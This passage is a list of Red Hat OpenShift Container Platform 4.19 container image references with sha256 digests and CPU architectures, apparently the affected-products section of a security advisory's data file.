"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
